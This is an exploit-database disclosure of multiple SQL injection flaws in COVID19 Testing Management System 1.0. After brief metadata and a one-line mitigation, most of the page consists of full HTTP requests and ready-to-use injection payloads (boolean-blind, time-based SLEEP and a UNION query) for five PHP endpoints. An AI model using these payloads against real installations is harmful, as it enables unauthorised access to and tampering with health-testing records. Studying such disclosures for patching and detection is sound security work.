COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections

vendor:

COVID19 Testing Management System

by:

Halit AKAYDIN (hLtAkydn)

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: COVID19 Testing Management System

Affected Version From: V1

Affected Version To: V1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux/Windows

2021

COVID19 Testing Management System 1.0 – ‘Multiple’ SQL Injections

PHP Dashboards is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

Input validation and sanitization should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

# Exploit Title: COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections
# Date: 17-08-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
# Version: V1
# Category: Webapps
# Tested on: Linux/Windows

# Description:
# PHP Dashboards is prone to an SQL-injection vulnerability
# because it fails to sufficiently sanitize user-supplied data before using
# it in an SQL query.Exploiting this issue could allow an attacker to
# compromise the application, access or modify data, or exploit latent
# vulnerabilities in the underlying database.

# Vulnerable Request:

POST /check_availability.php HTTP/1.1
Host: localhost
Content-Length: 12
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/add-phlebotomist.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
Connection: close

employeeid=1

# Vulnerable Payload:

# Parameter: employeeid (POST)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload:

employeeid=1' AND 2323=2323 AND 'gARj'='gARj

# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload:

employeeid=1' AND (SELECT 5982 FROM (SELECT(SLEEP(10)))aPnu) AND 'bDQl'='bDQl

------------------------------------------------------------------------------

# Vulnerable Request:

POST /add-phlebotomist.php HTTP/1.1
Host: localhost
Content-Length: 61
Cache-Control: max-age=0
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/add-phlebotomist.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
Connection: close

empid=1&fullname=dsadas&mobilenumber=1111111111&submit=Submit

# Vulnerable Payload:

# Parameter: empid (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload:

empid=1' AND (SELECT 4626 FROM (SELECT(SLEEP(10)))jVok) AND 'bqxW'='bqxW&fullname=dsadas&mobilenumber=1111111111&submit=Submit

------------------------------------------------------------------------------

# Vulnerable Request:

POST /edit-phlebotomist.php?pid=6 HTTP/1.1
Host: localhost
Content-Length: 61
Cache-Control: max-age=0
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/edit-phlebotomist.php?pid=6
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
Connection: close

empid=1&fullname=dsadas&mobilenumber=1111111111&update=Update

# Vulnerable Payload:

# Parameter: fullname (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload:

empid=1&fullname=dsadas' AND (SELECT 6868 FROM (SELECT(SLEEP(10)))yvbu) AND 'xVJk'='xVJk&mobilenumber=1111111111&update=Update

------------------------------------------------------------------------------

# Vulnerable Request:

POST /bwdates-report-result.php HTTP/1.1
Host: localhost
Content-Length: 51
Cache-Control: max-age=0
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/bwdates-report-ds.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
Connection: close

fromdate=2021-08-17&todate=2021-08-17&submit=Submit

# Vulnerable Payload:

# Parameter: fromdate (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload:

fromdate=2021-08-17' AND (SELECT 6977 FROM (SELECT(SLEEP(10)))pNed) AND 'qbnJ'='qbnJ&todate=2021-08-17&submit=Submit

------------------------------------------------------------------------------

# Vulnerable Request:

POST /search-report-result.php HTTP/1.1
Host: localhost
Content-Length: 27
Cache-Control: max-age=0
sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="88"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/search-report.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=cli5c49mh5ejaudonersihmhr9
Connection: close

serachdata=32&search=Search

# Vulnerable Payload:

# Parameter: serachdata (POST)
# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
# Payload:

serachdata=1231') AND (SELECT 1275 FROM (SELECT(SLEEP(10)))queW) AND ('HkZa'='HkZa&search=Search

# Type: UNION query
# Title: Generic UNION query (NULL) - 7 columns
# Payload:

serachdata=1231') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71706b7671,0x4a6d476c4861544c4c66446b6961755076707354414d6f5150436c766f6b4a624955625159747a4d,0x7170717071),NULL,NULL-- -&search=Search